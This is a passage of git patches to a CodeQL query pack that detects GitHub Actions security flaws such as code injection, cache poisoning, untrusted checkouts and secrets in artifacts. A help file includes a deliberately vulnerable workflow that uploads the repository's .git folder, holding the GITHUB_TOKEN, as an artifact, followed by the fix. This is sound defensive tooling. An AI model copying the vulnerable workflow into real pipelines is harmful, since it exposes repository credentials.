lots0logs/gh-action-get-changed-files | * | output.added | PR changed files | manual | | lots0logs/gh-action-get-changed-files | * | output.all | PR changed files | manual | | lots0logs/gh-action-get-changed-files | * | output.modified | PR changed files | manual | | lots0logs/gh-action-get-changed-files | * | output.renamed | PR changed files | manual | | marocchino/on_artifact | * | output.* | artifact | manual | +| martinhaintz/ga-file-list | * | output.file_names | filename | manual | +| martinhaintz/ga-file-list | * | output.files | filename | manual | | peter-murray/issue-body-parser-action | * | output.* | text | manual | | potiuk/get-workflow-origin | * | output.sourceHeadBranch | branch | manual | | puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | filename | manual | | redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | +| the-coding-turtle/ga-file-list | * | output.file_names | filename | manual | +| the-coding-turtle/ga-file-list | * | output.files | filename | manual | | tj-actions/branch-names | * | output.current_branch | branch | manual | | tj-actions/branch-names | * | output.head_ref_branch | branch | manual | | trilom/file-changes-action | * | output.files | filename | manual | @@ -1362,7 +1384,9 @@ sources | trilom/file-changes-action | * | output.files_modified | filename | manual | | trilom/file-changes-action | * | output.files_removed | filename | manual | | tzkhan/pr-update-action | * | output.headMatch | branch | manual | +| w3f/action-find-old-files | * | output.files | filename | manual | | xt0rted/pull-request-comment-branch | * | output.head_ref | branch | manual | +| yumemi-inc/changed-files | * | output.files | filename | manual | summaries | ActionsTools/read-json-action | * | artifact | output.* | taint | manual | | BrycensRanch/read-properties-action | * | artifact | output.* | taint | manual | From 48a0fd500d630e840e2797dd4cea2420e8658365 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 11 Sep 2024 18:09:05 +0200 Subject: [PATCH 506/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 45d91dcb7cc3..cf4acd613e31 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.42 +version: 0.1.43 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index a41aba954384..a5cff2605369 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.42 +version: 0.1.43 groups: [actions, queries] suites: codeql-suites extractor: javascript From 69818c5bb5a22c0d6327d572be0eb8f1b266fd98 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 12 Sep 2024 09:58:21 +0200 Subject: [PATCH 507/707] Remove bindingset from DataFlow's compatibleTypes --- ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 2d3918414106..0d214c63c5d1 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -166,8 +166,7 @@ class DataFlowType extends TDataFlowType { string ppReprType(DataFlowType t) { none() } -bindingset[t1, t2] -predicate compatibleTypes(DataFlowType t1, DataFlowType t2) { t1 = t2 } +predicate compatibleTypes(DataFlowType t1, DataFlowType t2) { any() } predicate typeStrongerThan(DataFlowType t1, DataFlowType t2) { none() } From 3a390582991cee93903a38be9f064237ae8f6af3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 12 Sep 2024 10:42:12 +0200 Subject: [PATCH 508/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index cf4acd613e31..0e019d05e86b 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.43 +version: 0.1.44 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index a5cff2605369..83c273431e17 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.43 +version: 0.1.44 groups: [actions, queries] suites: codeql-suites extractor: javascript From 69b9542a5f4c6ab446e71c1423f9a6caf8ba1b3c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 17 Sep 2024 17:06:50 +0200 Subject: [PATCH 509/707] Add help file for SecretsInArtifacts query --- ql/src/Security/CWE-312/SecretsInArtifacts.md | 47 +++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 ql/src/Security/CWE-312/SecretsInArtifacts.md diff --git a/ql/src/Security/CWE-312/SecretsInArtifacts.md b/ql/src/Security/CWE-312/SecretsInArtifacts.md new file mode 100644 index 000000000000..5b05c9a118fa --- /dev/null +++ b/ql/src/Security/CWE-312/SecretsInArtifacts.md @@ -0,0 +1,47 @@ +# Storage of sensitive information in GitHub Actions artifact + +## Description + +Sensitive information included in a GitHub Actions artifact can allow an attacker to access the sensitive information if the artifact is published. + +## Recommendation + +Only store information that is meant to be publicly available in a GitHub Actions artifact. + +## Example + +The following example uses `actions/checkout` to checkout code which stores the GITHUB_TOKEN in the \`.git/config\` file and then stores the contents of the \`.git\` repository into the artifact: + +```yaml +name: secrets-in-artifacts +on: + pull_request: +jobs: + a-job: # VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: . +``` + +The issue has been fixed below, where the `actions/upload-artifact` uses a version (v4+) which does not include hidden files or directories into the artifact. + +```yaml +name: secrets-in-artifacts +on: + pull_request: +jobs: + a-job: # NOT VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: "Upload artifact" + uses: actions/upload-artifact@v4 + with: + name: file + path: . +``` From 92f3b1614c16889ab32a6bc0fcfb7be2fced9c40 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 17 Sep 2024 17:07:35 +0200 Subject: [PATCH 510/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 0e019d05e86b..285f9cfe5235 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.44 +version: 0.1.45 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 83c273431e17..3c02acfff199 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.44 +version: 0.1.45 groups: [actions, queries] suites: codeql-suites extractor: javascript From 4f075f3f36679d9b289585bd967889c7def84104 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 19 Sep 2024 13:38:08 +0200 Subject: [PATCH 511/707] feat: Improve sanitizer checks --- ql/lib/codeql/actions/Helper.qll | 3 +- .../codeql/actions/security/ControlChecks.qll | 148 +++++++++++------- .../config/externally_triggereable_events.yml | 5 +- .../Security/CWE-074/OutputClobberingHigh.ql | 14 +- .../CWE-077/EnvPathInjectionCritical.ql | 14 +- .../CWE-077/EnvVarInjectionCritical.ql | 19 ++- .../CWE-088/ArgumentInjectionCritical.ql | 8 +- .../Security/CWE-094/CodeInjectionCritical.ql | 6 + .../CWE-349/CachePoisoningViaCodeInjection.ql | 4 +- .../CWE-349/CachePoisoningViaDirectCache.ql | 4 +- .../CachePoisoningViaPoisonableStep.ql | 4 +- .../UntrustedCheckoutTOCTOUCritical.ql | 7 +- .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 7 +- .../CWE-829/UntrustedCheckoutCritical.ql | 31 +++- .../Security/CWE-829/UntrustedCheckoutHigh.ql | 23 ++- .../CWE-829/.github/workflows/test11.yml | 94 +++++++++++ .../CWE-829/.github/workflows/test12.yml | 96 ++++++++++++ .../CWE-829/.github/workflows/test13.yml | 31 ++++ .../CWE-829/UnpinnedActionsTag.expected | 1 + .../UntrustedCheckoutCritical.expected | 11 +- .../CWE-829/UntrustedCheckoutHigh.expected | 1 + 21 files changed, 450 insertions(+), 81 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 1d88f6f65118..9ac67575b8b3 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -248,8 +248,7 @@ predicate inPrivilegedCompositeAction(AstNode node) { predicate inPrivilegedExternallyTriggerableJob(AstNode node) { exists(Job j | j = node.getEnclosingJob() and - j.isPrivilegedExternallyTriggerable() and - not exists(ControlCheck check, Event e | j.getATriggerEvent() = e | check.protects(node, e)) + j.isPrivilegedExternallyTriggerable() ) } diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 2d8e60dca376..650ae8d8105a 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -1,17 +1,46 @@ import actions +string any_relevant_category() { + result = + [ + "untrusted-checkout", "output-clobbering", "envpath-injection", "envvar-injection", + "command-injection", "argument-injection", "code-injection", "cache-poisoning", + "untrusted-checkout-toctou", "artifact-poisoning" + ] +} + +string any_non_toctou_category() { + result = any_relevant_category() and not result = "untrusted-checkout-toctou" +} + +string any_relevant_event() { + result = + [ + "pull_request_target", + "issue_comment", + "pull_request_comment", + "workflow_run", + "issues", + "fork", + "watch", + "discussion_comment", + "discussion" + ] +} + /** An If node that contains an actor, user or label check */ abstract class ControlCheck extends AstNode { ControlCheck() { this instanceof If or this instanceof Environment or - this instanceof UsesStep + this instanceof UsesStep or + this instanceof Run } - predicate protects(Step step, Event event) { + predicate protects(Step step, Event event, string category) { event.getEnclosingWorkflow() = step.getEnclosingWorkflow() and - this.getAProtectedEvent() = event.getName() and - this.dominates(step) + this.dominates(step) and + this.protectsCategoryAndEvent(category, event.getName()) } predicate dominates(Step step) { @@ -30,80 +59,71 @@ abstract class ControlCheck extends AstNode { step.getEnclosingJob().getANeededJob().getEnvironment() = this ) or - this.(UsesStep).getAFollowingStep() = step + this.(Step).getAFollowingStep() = step } - abstract string getAProtectedEvent(); - - abstract boolean protectsAgainstRefMutationAttacks(); + abstract predicate protectsCategoryAndEvent(string category, string event); } abstract class AssociationCheck extends ControlCheck { - // checks who you are (identity) - // association checks are effective against pull requests since they can control who is making the PR - // they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR - // someone entitled to trigger the workflow with a comment, may no detect a malicious comment, or the comment may mutate after approval - override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } - - override boolean protectsAgainstRefMutationAttacks() { result = true } + // Checks if the actor is a COLLABORATOR of the repo + // - they are effective against pull requests and workflow_run (since these are triggered by pull_requests) since they can control who is making the PR + // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR + override predicate protectsCategoryAndEvent(string category, string event) { + event = ["pull_request_target", "workflow_run"] and category = any_relevant_category() + } } abstract class ActorCheck extends ControlCheck { - // checks who you are (identity) - // actor checks are effective against pull requests since they can control who is making the PR - // they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR - // someone entitled to trigger the workflow with a comment, may no detect a malicious comment, or the comment may mutate after approval - override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } - - override boolean protectsAgainstRefMutationAttacks() { result = true } + // checks for a specific actor + // - they are effective against pull requests and workflow_run (since these are triggered by pull_requests) since they can control who is making the PR + // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR + override predicate protectsCategoryAndEvent(string category, string event) { + event = ["pull_request_target", "workflow_run"] and category = any_relevant_category() + } } abstract class RepositoryCheck extends ControlCheck { - // repository checks are effective against pull requests since they can control where the code is coming from - // they are not effective against issue_comment since the repository will always be the same - // who you are (identity) - override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } - - override boolean protectsAgainstRefMutationAttacks() { result = true } + // checks that the origin of the code is the same as the repository. + // for pull_requests, that means that it triggers only on local branches or repos from the same org + // - they are effective against pull requests/workflow_run since they can control where the code is coming from + // - they are not effective against issue_comment since the repository will always be the same + override predicate protectsCategoryAndEvent(string category, string event) { + event = ["pull_request_target", "workflow_run"] and category = any_relevant_category() + } } abstract class PermissionCheck extends ControlCheck { - // permission checks are effective against pull requests since they can control who can make changes - // they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR - // someone entitled to trigger the workflow with a comment, may no detect a malicious comment, or the comment may mutate after approval - // who you are (identity) - override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } - - override boolean protectsAgainstRefMutationAttacks() { result = true } + // checks that the actor has a specific permission level + // - they are effective against pull requests/workflow_run since they can control who can make changes + // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR + override predicate protectsCategoryAndEvent(string category, string event) { + event = ["pull_request_target", "workflow_run", "issue_comment"] and + category = any_relevant_category() + } } abstract class LabelCheck extends ControlCheck { - // does it protect injection attacks but not pwn requests? - // pwn requests are susceptible to checkout of mutable code - // but injection attacks are not, although a branch name can be changed after approval and perhaps also some other things - // they do actually protext against untrusted code execution (sha) - // what you have (approval) - // TODO: A check should be a combination of: - // - event type (pull_request, issue_comment, etc) - // - category (untrusted mutable code, untrusted immutable code, code injection, etc) - // - we dont know this unless we pass category to inPrivilegedContext and into ControlCheck.protects - // - we can decide if a control check is effective based only on the ast node - override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } - - // ref can be mutated after approval - override boolean protectsAgainstRefMutationAttacks() { result = false } + // checks if the issue/pull_request is labeled, which implies that it could have been approved + // - they dont protect against mutation attacks + override predicate protectsCategoryAndEvent(string category, string event) { + event = ["pull_request_target", "workflow_run"] and category = any_non_toctou_category() + } } class EnvironmentCheck extends ControlCheck instanceof Environment { // Environment checks are not effective against any mutable attacks - // they do actually protext against untrusted code execution (sha) - // what you have (approval) - EnvironmentCheck() { any() } - - override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } + // they do actually protect against untrusted code execution (sha) + override predicate protectsCategoryAndEvent(string category, string event) { + event = ["pull_request_target", "workflow_run"] and category = any_non_toctou_category() + } +} - // ref can be mutated after approval - override boolean protectsAgainstRefMutationAttacks() { result = false } +abstract class CommentVsHeadDateCheck extends ControlCheck { + override predicate protectsCategoryAndEvent(string category, string event) { + // by itself, this check is not effective against any attacks + none() + } } /* Specific implementations of control checks */ @@ -184,6 +204,12 @@ class AssociationActionCheck extends AssociationCheck instanceof UsesStep { class PermissionActionCheck extends PermissionCheck instanceof UsesStep { PermissionActionCheck() { + this.getCallee() = "sushichop/action-repository-permission" and + this.getArgument("required-permission") = ["write", "admin"] + or + this.getCallee() = "prince-chrismc/check-actor-permissions-action" and + this.getArgument("permission") = ["write", "admin"] + or this.getCallee() = "lannonbr/repo-permission-check-action" and this.getArgument("permission") = ["write", "admin"] or @@ -195,3 +221,13 @@ class PermissionActionCheck extends PermissionCheck instanceof UsesStep { ) } } + +class BashCommentVsHeadDateCheck extends CommentVsHeadDateCheck, Run { + BashCommentVsHeadDateCheck() { + exists(string line | + line = this.getScript().splitAt("\n") and + line.toLowerCase() + .regexpMatch(".*date\\s+-d.*(commit_at|pushed_at|comment_at|commented_at).*date\\s+-d.*(commit_at|pushed_at|comment_at|commented_at).*") + ) + } +} diff --git a/ql/lib/ext/config/externally_triggereable_events.yml b/ql/lib/ext/config/externally_triggereable_events.yml index 88d17c728b75..028671c243dd 100644 --- a/ql/lib/ext/config/externally_triggereable_events.yml +++ b/ql/lib/ext/config/externally_triggereable_events.yml @@ -6,13 +6,14 @@ extensions: - ["discussion"] - ["discussion_comment"] - ["fork"] + - ["watch"] - ["issue_comment"] - ["issues"] - - ["pull_request"] + - ["pull_request"] # non-privileged - ["pull_request_comment"] - ["pull_request_review"] - ["pull_request_review_comment"] - ["pull_request_target"] - - ["workflow_run"] # depending on trigger workflow + - ["workflow_run"] # depending on branch filter - ["workflow_call"] # depending on caller diff --git a/ql/src/Security/CWE-074/OutputClobberingHigh.ql b/ql/src/Security/CWE-074/OutputClobberingHigh.ql index c53489f96285..0ead5aa76890 100644 --- a/ql/src/Security/CWE-074/OutputClobberingHigh.ql +++ b/ql/src/Security/CWE-074/OutputClobberingHigh.ql @@ -16,6 +16,7 @@ import actions import codeql.actions.security.OutputClobberingQuery import codeql.actions.dataflow.ExternalFlow import OutputClobberingFlow::PathGraph +import codeql.actions.security.ControlChecks from OutputClobberingFlow::PathNode source, OutputClobberingFlow::PathNode sink where @@ -23,9 +24,20 @@ where inPrivilegedContext(sink.getNode().asExpr()) and // exclude paths to file read sinks from non-artifact sources ( - not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + not exists(ControlCheck check | + check + .protects(sink.getNode().asExpr(), + source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection") + ) or source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + not exists(ControlCheck check | + check + .protects(sink.getNode().asExpr(), + source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), + ["untrusted-checkout", "artifact-poisoning"]) + ) and ( sink.getNode() instanceof OutputClobberingFromFileReadSink or sink.getNode() instanceof WorkflowCommandClobberingFromFileReadSink or diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql index 4ff86eb0fbde..9fa066d195ce 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql @@ -15,15 +15,27 @@ import actions import codeql.actions.security.EnvPathInjectionQuery import EnvPathInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and inPrivilegedContext(sink.getNode().asExpr()) and ( - not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + not exists(ControlCheck check | + check + .protects(sink.getNode().asExpr(), + source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection") + ) or source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + not exists(ControlCheck check | + check + .protects(sink.getNode().asExpr(), + source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), + ["untrusted-checkout", "artifact-poisoning"]) + ) and sink.getNode() instanceof EnvPathInjectionFromFileReadSink ) select sink.getNode(), source, sink, diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql index 89e1ddd3cc2d..806bae2a91d2 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql @@ -16,16 +16,33 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import codeql.actions.dataflow.ExternalFlow import EnvVarInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and inPrivilegedContext(sink.getNode().asExpr()) and + not exists(ControlCheck check | + check + .protects(sink.getNode().asExpr(), + source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "envvar-injection") + ) and // exclude paths to file read sinks from non-artifact sources ( - not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + not exists(ControlCheck check | + check + .protects(sink.getNode().asExpr(), + source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection") + ) or source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + not exists(ControlCheck check | + check + .protects(sink.getNode().asExpr(), + source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), + ["untrusted-checkout", "artifact-poisoning"]) + ) and ( sink.getNode() instanceof EnvVarInjectionFromFileReadSink or madSink(sink.getNode(), "envvar-injection") diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql index affa372f14eb..6f1f6008a062 100644 --- a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql +++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql @@ -14,11 +14,17 @@ import actions import codeql.actions.security.ArgumentInjectionQuery import ArgumentInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks from ArgumentInjectionFlow::PathNode source, ArgumentInjectionFlow::PathNode sink where ArgumentInjectionFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) + inPrivilegedContext(sink.getNode().asExpr()) and + not exists(ControlCheck check | + check + .protects(sink.getNode().asExpr(), + source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "argument-injection") + ) select sink.getNode(), source, sink, "Potential argument injection in $@ command, which may be controlled by an external user.", sink, sink.getNode().(ArgumentInjectionSink).getCommand() diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql index 9319718b7fc0..ec4925d24a0c 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql @@ -17,11 +17,17 @@ import actions import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where CodeInjectionFlow::flowPath(source, sink) and inPrivilegedContext(sink.getNode().asExpr()) and + not exists(ControlCheck check | + check + .protects(sink.getNode().asExpr(), + source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection") + ) and // exclude cases where the sink is a JS script and the expression uses toJson not exists(UsesStep script | script.getCallee() = "actions/github-script" and diff --git a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql index 685bdcca401f..67b615d115a6 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql @@ -26,7 +26,9 @@ where // job can be triggered by an external user e.isExternallyTriggerable() and // the checkout is not controlled by an access check - not exists(ControlCheck check | check.protects(source.getNode().asExpr(), j.getATriggerEvent())) and + not exists(ControlCheck check | + check.protects(source.getNode().asExpr(), j.getATriggerEvent(), "code-injection") + ) and // excluding privileged workflows since they can be exploited in easier circumstances not j.isPrivileged() and ( diff --git a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql index ea36bcf0be1c..b6df022329dd 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql @@ -57,7 +57,9 @@ where path = source.(UntrustedArtifactDownloadStep).getPath() ) and // the checkout/download is not controlled by an access check - not exists(ControlCheck check | check.protects(source, j.getATriggerEvent())) and + not exists(ControlCheck check | + check.protects(source, j.getATriggerEvent(), ["untrusted-checkout", "artifact-poisoning"]) + ) and j.getATriggerEvent() = e and // job can be triggered by an external user e.isExternallyTriggerable() and diff --git a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql index ee2719f06112..0750a02930eb 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql @@ -34,7 +34,9 @@ where path = source.(UntrustedArtifactDownloadStep).getPath() ) and // the checkout/download is not controlled by an access check - not exists(ControlCheck check | check.protects(source, j.getATriggerEvent())) and + not exists(ControlCheck check | + check.protects(source, j.getATriggerEvent(), ["untrusted-checkout", "artifact-poisoning"]) + ) and j.getATriggerEvent() = e and // job can be triggered by an external user e.isExternallyTriggerable() and diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index a97309ce187b..7c7ab15de319 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -24,11 +24,10 @@ where // the checked-out code may lead to arbitrary code execution checkout.getAFollowingStep() = s and // the checkout occurs in a privileged context - j.isPrivilegedExternallyTriggerable() and + inPrivilegedContext(checkout) and // the mutable checkout step is protected by an Insufficient access check - check.dominates(checkout) and - check.protects(checkout, j.getATriggerEvent()) and - check.protectsAgainstRefMutationAttacks() = false + check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout") and + not check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout-toctou") select s, checkout, s, "Insufficient protection against execution of untrusted code on a privileged workflow on check $@.", check, check.toString() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index 0a83cc54ad69..7f584e00c9ac 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -22,11 +22,10 @@ where // there are no evidences that the checked-out gets executed not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context - j.isPrivilegedExternallyTriggerable() and + inPrivilegedContext(checkout) and // the mutable checkout step is protected by an Insufficient access check - check.dominates(checkout) and - check.protects(checkout, j.getATriggerEvent()) and - check.protectsAgainstRefMutationAttacks() = false + check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout") and + not check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout-toctou") select checkout, "Insufficient protection against execution of untrusted code on a privileged workflow on step $@.", check, check.toString() diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 2026a784d055..499abc047b65 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -20,10 +20,33 @@ import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getNextStep() = b } -from PRHeadCheckoutStep checkout, PoisonableStep s +from PRHeadCheckoutStep checkout, PoisonableStep step where // the checkout is followed by a known poisonable step - checkout.getAFollowingStep() = s and + checkout.getAFollowingStep() = step and // the checkout occurs in a privileged context - inPrivilegedContext(checkout) -select s, checkout, s, "Execution of untrusted code on a privileged workflow." + inPrivilegedContext(checkout) and + ( + // issue_comment: check for date comparison checks and actor/access control checks + exists(Event event | + event.getName() = "issue_comment" and + event = checkout.getEnclosingJob().getATriggerEvent() and + not exists(ControlCheck check, CommentVsHeadDateCheck date_check | + ( + check instanceof ActorCheck or + check instanceof AssociationCheck or + check instanceof PermissionCheck + ) and + check.dominates(checkout) and + date_check.dominates(checkout) + ) + ) + or + // not issue_comment triggered workflows + exists(Event event | + not event.getName() = "issue_comment" and + event = checkout.getEnclosingJob().getATriggerEvent() and + not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) + ) + ) +select step, checkout, step, "Execution of untrusted code on a privileged workflow." diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index 0675603af0f9..8577218800e1 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -23,5 +23,26 @@ where // the checkout is NOT followed by a known poisonable step not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context - inPrivilegedContext(checkout) + inPrivilegedContext(checkout) and + ( + // issue_comment: check for date comparison checks and actor/access control checks + exists(Event e | + e.getName() = "issue_comment" and + checkout.getEnclosingJob().getATriggerEvent() = e and + not exists(ControlCheck write_check, CommentVsHeadDateCheck data_check | + (write_check instanceof ActorCheck or write_check instanceof AssociationCheck) and + write_check.dominates(checkout) and + data_check.dominates(checkout) + ) + ) + or + // not issue_comment triggered workflows + exists(Event event | + not event.getName() = "issue_comment" and + not exists(ControlCheck check | + check + .protects(checkout, checkout.getEnclosingJob().getATriggerEvent(), "untrusted-checkout") + ) + ) + ) select checkout, "Potential execution of untrusted code on a privileged workflow." diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml new file mode 100644 index 